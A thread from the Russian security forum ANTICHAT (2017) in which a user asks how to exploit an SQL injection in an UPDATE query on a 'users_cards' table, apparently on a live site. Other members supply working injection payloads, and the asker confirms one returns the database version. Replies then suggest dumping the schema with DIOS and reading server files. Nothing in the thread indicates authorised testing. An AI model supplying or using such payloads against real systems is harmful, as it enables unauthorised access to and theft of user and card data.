ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
25.10.2017, 00:05
|
|
Guest
Сообщений: n/a
Провел на форуме:
169212
Репутация:
441
|
|
|
|
|
|
26.10.2017, 19:48
|
|
Guest
Сообщений: n/a
Провел на форуме:
19301
Репутация:
0
|
|
Вопрос, как раскрутить данную скулю? Через sqlmap не выходит, сразу разлогинивает, даже если передавать все заголовки.
Код:
Code:
update users_cards set cardno = ''', name = '' where id_users=65 and id=33
ERROR #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''', name = '' where id_users=65 and id=33' at line 2
такая же есть с insert |
|
|
|
27.10.2017, 00:09
|
|
Guest
Сообщений: n/a
Провел на форуме:
169212
Репутация:
441
|
|
Если где-то видно name, то можно сделать так:
Код:
Code:
123', name = version() where id_users=65 and id=33 #
где 123 валидный cardno.
Иначе, крутить как error based, вывод ошибок есть. Материалов на эту тему много. |
|
|
|
27.10.2017, 00:58
|
|
Guest
Сообщений: n/a
Провел на форуме:
19301
Репутация:
0
|
|
Сообщение от crlf
crlf said:
↑
Если где-то видно
name
, то можно сделать так:
Код:
Code:
123', name = version() where id_users=65 and id=33 #
где
123
валидный
cardno
.
Иначе, крутить как error based, вывод ошибок есть. Материалов на эту тему много. коммент не канает... ни --, ни #
|
|
|
|
27.10.2017, 01:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
169212
Репутация:
441
|
|
Сообщение от foozzione
foozzione said:
↑
коммент не канает... ни --, ни # Что пишет?
|
|
|
|
27.10.2017, 13:11
|
|
Guest
Сообщений: n/a
Провел на форуме:
300820
Репутация:
90
|
|
Сообщение от foozzione
foozzione said:
↑
Вопрос, как раскрутить данную скулю? Через sqlmap не выходит, сразу разлогинивает, даже если передавать все заголовки.
Код:
Code:
update users_cards set cardno = ''', name = '' where id_users=65 and id=33
ERROR #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''', name = '' where id_users=65 and id=33' at line 2
такая же есть с insert update users_cards set cardno = ' ',cardno=version(), name='', name = '' where id_users=65 and id=33
|
|
|
|
27.10.2017, 14:00
|
|
Guest
Сообщений: n/a
Провел на форуме:
19301
Репутация:
0
|
|
Код:
Code:
update users_cards set cardno = '123', name = version() where id_users=65 and id=33 #', name = '' where id_users=66 and id=34
ERROR #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'name = '' where id_users=66 and id=34' at line 3
|
|
|
|
27.10.2017, 14:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
19301
Репутация:
0
|
|
Сообщение от t0ma5
t0ma5 said:
↑
update users_cards set cardno = '
',cardno=version(), name='
', name = '' where id_users=65 and id=33 сработало! То есть таким образом я в принципе могу с другой таблицы вывести данные?
|
|
|
|
27.10.2017, 14:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
300820
Репутация:
90
|
|
Сообщение от foozzione
foozzione said:
↑
сработало! То есть таким образом я в принципе могу с другой таблицы вывести данные? да, можно через dios составить схему базы http://forum.sqliwiki.com/showthread.php?tid=39 чтоб одним запросом
насчет файлов не проверял, если file_priv = ON возможно получится читать файлы
|
|
|
|
27.10.2017, 14:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
19301
Репутация:
0
|
|
просмотрел ман, все вроде как понятно, но не могу воспроизвести в update это
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
